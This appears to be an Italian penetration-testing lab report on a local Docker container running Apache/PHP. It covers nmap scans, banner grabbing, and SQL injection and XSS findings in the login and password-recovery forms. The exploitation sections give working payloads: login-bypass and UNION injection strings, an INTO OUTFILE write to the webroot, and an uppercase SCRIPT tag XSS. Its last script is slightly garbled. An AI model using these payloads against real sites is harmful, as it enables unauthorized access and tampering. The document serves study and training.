

PENETRATION TESTING 2024

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1 Information gathering

Per il caso specifico non é necessario effettuare nessuna raccolta d'informazioni avendo a disposizione solo immagine docker.

Al container generato dall'immagine viene allocato l'indirizzo IP 172.19.0.3.

2 Network Scanning

Ipotizziamo il container non é nella nostra stessa rete locale.

- Scansione di Livello 3 (Scansione ICMP/Ping):

```
# nmap -sn 172.19.0.3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 17:37 UTC
Nmap scan report for penetrated.test.network (172.19.0.3)
Host is up (0.00021s latency).
MAC Address: 02:42:AC:13:00:03 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds
```

- Scansione di Livello 4 (Scansione TCP e UDP):

- Scansione TCP SYN:

```
# nmap -p- -sS 172.19.0.3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 15:44 UTC
Nmap scan report for penetrated.test.network (172.19.0.3)
Host is up (0.0000030s latency).
Not shown: 65534 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
MAC Address: 02:42:AC:13:00:03 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds
```

- Scansione UDP: ...

```
nmap -p- -sU -top-ports 100 -min-rate 1000 172.19.0.3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 16:48 UTC
Nmap scan report for penetrated.test.network (172.19.0.3)
Host is up (0.000036s latency).
Not shown: 96 open|filtered udp ports (no-response)
PORT      STATE SERVICE
69/udp    closed tftp
443/udp    closed https
1434/udp   closed ms-sql-m
49156/udp  closed unknown
MAC Address: 02:42:AC:13:00:03 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.46 seconds

# nmap -p- -sU -min-rate 1000 172.19.0.3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 17:09 UTC
Warning: 172.19.0.3 giving up on port because retransmission cap hit (10).
Nmap scan report for penetrated.test.network (172.19.0.3)
```

```

Host is up (0.00011s latency).
All 65535 scanned ports on penetrated.test.network (172.19.0.3) are in ignored states.
Not shown: 64811 open|filtered udp ports (no-response), 724 closed udp ports (port-unreach)
MAC Address: 02:42:AC:13:00:03 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 718.97 seconds

```

- **Strumenti utilizzati:**

- Nmap

- **Risultati:** Il container risponde solamente sulla porta 80.

3 Enumeration

- **Banner Grabbing:**

- **Banner Grabbing - OS:**

```

# nmap -O -p 80 172.19.0.3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 18:22 UTC
Nmap scan report for penetrated.test.network (172.19.0.3)
Host is up (0.00015s latency).

PORT      STATE SERVICE
80/tcp    open  http
MAC Address: 02:42:AC:13:00:03 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

```

- **Banner Grabbing - Web server:**

```

# nmap -sV -p 80 172.19.0.3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 18:21 UTC
Nmap scan report for penetrated.test.network (172.19.0.3)
Host is up (0.000045s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http      Apache httpd 2.4.38 ((Debian))
MAC Address: 02:42:AC:13:00:03 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.38 seconds

# telnet 172.19.0.3 80
Trying 172.19.0.3...
Connected to 172.19.0.3.
Escape character is '^]'.
HEAD / HTTP/1.1
HOST: 172.19.0.3
HTTP/1.1 408 Request Timeout
Date: Sat, 08 Feb 2025 18:50:04 GMT
Server: Apache/2.4.38 (Debian)
Connection: close
Content-Type: text/html; charset=iso-8859-1

Connection closed by foreign host.

```

- **UserDir Enumeration:**
- **Metasploit:**
- **Strumenti utilizzati:**
 - Nmap
 - Telnet
 - Metasploit
- **Risultati:**
 - **OS:** Linux 4.15 - 5.8
 - **WEB Server:** Apache/2.4.38 (Debian)
 - **PHP:** PHP/7.2.34
 - **UserDir:** Sul server web il modulo *mod_userdir* non é attivo

4 Vulnerability Assessment

Procedura di login soggetta a possibile SQLi. Infatti inserendo un `'''` (apice singolo) nel campo **Username** e un qualsiasi valore nel campo **Password** restituisce il seguente messaggio:

Notice: Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'c9c35cf409344312146fa7546a94d1a6' at line 1 in /var/www/html/login.php on line 63

La procedura di password recovery non esegue un corretto controllo dei dati ingresso del campo **Email address** ed è soggetta a XSS.

5 Exploitation

La SQL Injection nella procedura di login è possibile utilizzando `'''` (apice singolo), in questo modo è possibile modificare la query che viene eseguita

per il controllo delle credenziali.
Possibili esempio PoC:

1. **username:** ' UNION SELECT null, null, user() #
password: valore qualsiasi
2. **username:** ' OR null is null limit 1 #
password: valore qualsiasi

Il XSS nella procedura di password recovery è possibile utilizzando i tags <SCRIPT> o (i nome dei tags devo essere MAIUSCOLI).
Possibili esempi di PoC:

1. **Email address:** <SCRIPT>alert('Hello')</SCRIPT>
2. **Email address:**

6 Post Exploitation

```
' or null is null INTO OUTFILE '/var/www/html/TEST.txt' #  
<SCRIPT>function test()fetch('TEST.txt').then(response => response.text()).then(da  
=> alert(data))test();</SCRIPT>
```

...